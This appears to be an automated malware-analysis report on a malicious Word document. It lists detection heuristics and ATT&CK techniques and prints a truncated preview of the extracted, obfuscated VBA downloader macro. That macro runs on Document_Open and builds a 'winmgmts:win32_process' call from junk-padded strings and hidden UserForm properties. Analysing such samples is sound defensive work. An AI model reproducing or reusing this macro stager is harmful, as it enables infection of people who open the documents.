MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro and a hidden-property command stager, which are indicative of a downloader. The ClamAV detection 'Doc.Downloader.Generic-9393258-0' further supports this. The macro's primary function appears to be executing a secondary payload, likely downloaded from an external source, although the specific download URL is not directly extractable from the provided script excerpts.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-9393258-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-9393258-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15345 bytes |
SHA-256: df93d4b3826c1017fc128f5aa2871fa3fab73632b619dd8b1084750b2268cb3a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Y3gsywhtb_d7p"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Clqci_avqs5t7t2yg0.Qcro14kf1lpyj
End Sub
Attribute VB_Name = "Clqci_avqs5t7t2yg0"
Attribute VB_Base = "0{B0836D73-CF05-4B6B-AB78-0DCCAF1D15A6}{7705F601-4322-4493-A495-1E3B221F7C36}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Qcro14kf1lpyj()
Djhh8t24ym6mcsh_f4 = "370"
If Len("Gr9r2v0yqeyno_dU45offxs2zpn77d") = Len("T38sh4qx07ly__") + 1 Then End
If Len("I07pglpod5q2bgUubhwxdvoamhqk5N3idoar8fmn4y3bpqm") < Len("Tx4o5inso5e") Then
MsgBox "Cj79_5di3debjjk8x0" + "Tdgdl1no6atddbnku4"
MsgBox ("Bvnemyt2eu0q6p8n7")
MsgBox "Euhwqjhjaba7_2e48n" + "Y6p40i58uyygzr"
End If
If Len("Jjxrfd9dys2jvIctt09c22inw") = Len("Qvm6loxo6fpil") Then
MsgBox "T3ki_jzivfy" + "Okwsodu2kslyp695"
MsgBox ("Xdly8l0ranmypa !!!")
MsgBox "Ev6n3n3lyu2k" + "Q4fm72ycmcy0xb"
End If
Zgxksm1n993co = Clqci_avqs5t7t2yg0.HelpContextId + 50 + 50
Dshlgfawm4f9 = "516"
If Len("Tggyjigykdi0c55ftM_ejdkfzyluxmw85") = Len("Dtmiz0t6o0melhq4d") + 1 Then End
If Len("Yzsc8svv6ey3wcicQhr3avo1l4umed6iYfjcw5yeephxmj8is5") < Len("Q99ddmvzai1a5tz") Then
MsgBox "C4wao4y8ghd" + "Oydwkjw_bbg1bfx7oo"
MsgBox ("Cyf4p74g5ka98j")
MsgBox "Dmfd2u8zcbx8_jf3" + "U5_lo7y2rd31aek"
End If
If Len("K_l2kx6h0c24_5Rstfdjl3rrnkrf_c9n") = Len("Pj6bhe04nle72x") Then
MsgBox "Chs0ghdi6k8m" + "B_a4puiy5rlber"
MsgBox ("Lmvxxla3v_gisb_3k3 !!!")
MsgBox "Sollqgpsk2g8c1e" + "Nzk1cbhp5jm2x51aj"
End If
Srfsgbmr4szcw7 = ChrW(Zgxksm1n993co + (15))
E_coit9wu0j_ipuu4w = "918"
If Len("Mgwko_72balseogrv8K_xi8kbg3mwk") = Len("Tmf5v1ypn37vjre") + 1 Then End
If Len("B90xxha69z_n4doT224im86j2bh3yV8v1pxx9uml771kw") < Len("Jq6t2mo1aeo8g") Then
MsgBox "Ckbgrio_4d5gq8raf" + "D45m5edug_otjaotiw"
MsgBox ("O5o7ox2zu7sja0q4o")
MsgBox "Tr8c8covk6449y6gve" + "Xqzcptyz2ou4iats"
End If
If Len("Yr8mr4n88205Volcruborujnyh") = Len("Av4og1iehoqxmgt4") Then
MsgBox "Wmugsgt_q2q9y05v" + "Wl0uyzvkeyb8zh92"
MsgBox ("Nmyutpjo2_4gtqw !!!")
MsgBox "Smi5fhy08os" + "C2utgfps9dl7zg"
End If
Blswr4yymtv620 = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Srfsgbmr4szcw7 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Clqci_avqs5t7t2yg0.Q9usvrg1lo8fi2l4s5 + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
V9ktdghk2m7o3pb1t6 = "783"
If Len("Pzdi3r2y8l6h6Gemzx1xd4rp4p") = Len("Ibd2u5ni21scmt") + 1 Then End
If Len("Z8ebbtk1b7f1tQ40bjm6hdxa_aoxgunU4uk3o0amc6") < Len("C5me9tbcgq34ra") Then
MsgBox "N8c6m4w2dcs" + "Qllsfji8fzj1"
MsgBox ("Nk9mb242mpekhsws")
MsgBox "Gbpmo369xuj" + "X6xni5sypcl"
End If
If Len("Mk7hi92xpcqiklesKphuxqvr9_z") = Len("Vyg116d8x1z") Then
MsgBox "Pz6opc8zawaxee56k" + "H0ctvojtuqbwqz1o"
MsgBox ("Ywgc6cadixtwwbjw8p !!!")
MsgBox "Tdeqe7sryogm91g6" + "Czq8bqm2290o"
End If
Pqh8x6ldbjbza8 = Z16pyvooaxdvtdye(Blswr4yymtv620)
F3tmkf0icqyh6tr = "770"
If Len("Lhy5df9qz7t_9Hj906d6k44dd0yo") = Len("G3in5irhrc5cy")
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.